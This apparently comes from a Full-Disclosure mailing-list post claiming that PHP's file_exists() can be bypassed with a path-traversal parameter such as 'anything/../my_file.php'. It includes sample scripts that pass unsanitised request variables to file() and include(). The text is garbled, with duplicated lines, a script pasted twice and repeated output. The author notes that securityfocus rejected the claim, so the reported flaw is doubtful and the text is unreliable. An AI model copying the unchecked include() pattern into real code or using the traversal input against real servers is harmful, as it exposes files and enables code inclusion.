Hi,
There is a security problem on the file_exists() function who allows
unauthorized users to bypassing the function.
unauthorized users to bypassing the function.
For example, an user use this function for checking the existence and
display the source code of his file "my_file.php" in the "/test"
directory.
display the source code of his file "my_file.php" in the "/test"
directory.
He use for this a script like this one :
----- file_exists.php -----
<?php
if(file_exists($var)){
echo("File exist<br><br>");
$source = file( $var );
while ( list( $num_line, $line ) = each( $source ) )
{
echo "<B>Line $num_line:</B> ".htmlspecialchars( $line ) . "<br>";
}
}else{
echo("File doesn't exist<br<br ");
$source = file( $var );
while ( list( $num_line, $line ) = each( $source ) )
{
echo "<B>Line $num_line:</B> ".htmlspecialchars( $line ) . "<br>";
}
}
?
if(file_exists($var)){
echo("File exist<br><br>");
$source = file( $var );
while ( list( $num_line, $line ) = each( $source ) )
{
echo "<B>Line $num_line:</B> ".htmlspecialchars( $line ) . "<br>";
}
}else{
echo("File doesn't exist<br<br ");
$source = file( $var );
while ( list( $num_line, $line ) = each( $source ) )
{
echo "<B>Line $num_line:</B> ".htmlspecialchars( $line ) . "<br>";
}
}
?
----- file_exists.php -----
He test his script with the following adress on his server :
http://[server]/test/file_exists.php?var=my_file.php
http://[server]/test/file_exists.php?var=my_file.php
The file "my_file.php" contain the following text :
----- my_file.php -----
PHP is a widely-used
general-purpose scripting
language that is especially
suited for Web development
and can be embedded into HTML.
general-purpose scripting
language that is especially
suited for Web development
and can be embedded into HTML.
----- my_file.php -----
After launching his script, he obtain :
File exist
Line 0: PHP is a widely-used
Line 1: general-purpose scripting
Line 2: language that is especially
Line 3: suited for Web development
Line 4: and can be embedded into HTML.
Line 1: general-purpose scripting
Line 2: language that is especially
Line 3: suited for Web development
Line 4: and can be embedded into HTML.
Up to here everything seems to be normal.
If he test it with another name file, he obtain :
File doesn't exist
Warning: file(test): failed to open stream: No such file or directory in
/home/xxx/www/test/file_exists.php on line 11
Warning: Variable passed to each() is not an array or object in
/home/xxx/www/test/file_exists.php on line 12
/home/xxx/www/test/file_exists.php on line 12
It's normal too...
But, if an user test this script for example with the following link :
http://[server]/test/file_exists.php?var=anything/../my_file.php, he
obtain
:
http://[server]/test/file_exists.php?var=anything/../my_file.php, he
obtain
:
File doesn't exist
Line 0: PHP is a widely-used
Line 1: general-purpose scripting
Line 2: language that is especially
Line 3: suited for Web development
Line 4: and can be embedded into HTML.
Line 1: general-purpose scripting
Line 2: language that is especially
Line 3: suited for Web development
Line 4: and can be embedded into HTML.
We can see that the file_exists() function return that the file doesn't
exist, but the source code has been displayed.
exist, but the source code has been displayed.
It's a very critical bug because a malicious user can use it to bypassing
the file_exist() protection on a include() script for example.
the file_exist() protection on a include() script for example.
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Another example more simply:
In the same directory :
test.php
-----------------------------------------------------------
<?
if(file_exists($page)){
echo("Sorry the local page is protected");
}else{
include($page);
}
?>
-----------------------------------------------------------
file.txt
-----------------------------------------------------------
Hello Word
-----------------------------------------------------------
Result:
Sorry the local page is protected
Result:
Hello Word
The function file_exists() is bypassing
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
I want to know if you thinks that's a real vulnerability or not ? (securityfocus says NO and don't want to publish it)
If you have any questions. Don't hesitate to contact me.
Nourredine Himeur
[EMAIL PROTECTED]
Dialoguez en direct et gratuitement avec vos amis sur MSN Messenger ! _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html